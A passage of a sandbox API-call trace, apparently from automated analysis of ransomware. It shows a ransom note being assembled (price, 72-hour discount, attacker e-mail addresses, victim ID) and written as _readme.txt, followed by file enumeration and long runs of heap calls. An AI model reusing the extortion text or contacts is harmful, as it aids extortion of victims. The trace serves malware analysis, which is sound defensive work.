available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0175.126] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d16e48 [0175.126] CreateFileW (lpFileName="C:\\Boot\\pt-PT\\_readme.txt" (normalized: "c:\\boot\\pt-pt\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0175.127] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d16e48 | out: hHeap=0x6a0000) returned 1 [0175.128] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30670 | out: hHeap=0x6a0000) returned 1 [0175.128] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.128] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.128] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-PT\\*" (normalized: "c:\\boot\\pt-pt\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28dd07a0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0175.129] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.129] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28dd07a0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0175.129] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe823ce95, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15e40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0175.130] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe823ce95, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15e40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0175.130] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0175.130] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.130] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d276f8 | out: hHeap=0x6a0000) returned 1 [0175.130] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d276f8 [0175.130] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0175.131] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.131] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.131] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.131] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.131] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.131] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.132] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.132] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.132] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.132] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.132] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.133] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.133] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.133] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.133] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.133] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.133] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.133] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.134] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.134] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.134] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.134] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0175.134] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.135] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.135] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.135] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.135] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0175.135] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.136] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.136] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.136] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.136] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.137] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.137] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.137] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.137] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0175.137] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.137] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.137] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.138] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.138] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.138] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.138] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.138] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.138] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.139] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.139] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.139] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.139] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.140] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.140] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.140] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.140] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.140] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.140] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.140] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0175.141] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.141] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.141] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.141] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0175.141] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.142] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.142] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.142] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.142] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.142] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.142] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.142] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.143] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.143] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.143] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.143] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.144] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.144] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.144] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.144] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.144] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.145] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.145] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.145] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.145] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.146] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.146] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.146] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.146] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.146] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.146] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.146] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.147] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.147] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.147] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.147] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.147] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0175.147] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.148] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.148] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.148] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.148] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.148] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.149] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.149] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.149] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.149] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0175.149] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.149] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.150] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.150] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.150] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.150] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.151] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.151] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.151] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.151] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.152] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.152] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.152] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.152] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.152] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.152] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.153] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.153] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.153] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.153] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.153] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.153] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0175.154] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.154] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.154] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.154] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.154] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0175.154] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.155] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.155] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.155] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0175.156] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.156] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.156] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.156] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.157] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.157] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.157] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.157] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.158] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.158] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.158] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.158] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.158] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.159] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.159] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.159] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.159] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.160] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.160] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.160] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.160] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.171] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.171] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.171] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.171] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.172] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.172] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.172] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.172] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.172] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.172] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.172] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.173] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0175.173] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.173] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.173] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.173] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.173] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.174] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.174] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.174] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.174] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.174] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.174] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.174] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.174] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.175] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.175] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.175] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0175.175] RtlAllocateHeap 